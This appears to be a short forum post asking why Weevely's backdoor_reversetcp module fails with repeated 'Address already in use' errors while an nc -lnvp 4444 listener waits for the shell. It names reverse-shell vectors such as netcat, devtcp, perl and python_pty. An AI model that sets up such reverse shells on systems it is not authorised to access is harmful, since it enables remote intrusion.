I'm trying to reverse shell using module backdoor_reversetcp

backdoor_reversetcp 4444 - Connecting to my Machine
nc -lnvp 4444 - Waiting Shell

Weevely run 8 vector netcat_bsd,netcat,python,devtcp,perl,ruby,telnet,python_pty, so, running the command I receive this output

Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'

That is funny part, if I remove the listening port 4444 to another one 4445, once I have no Listening port, the output is blank. It is normal? If I try from another machine is fine, works. But from that specific machine, I cannot do that.

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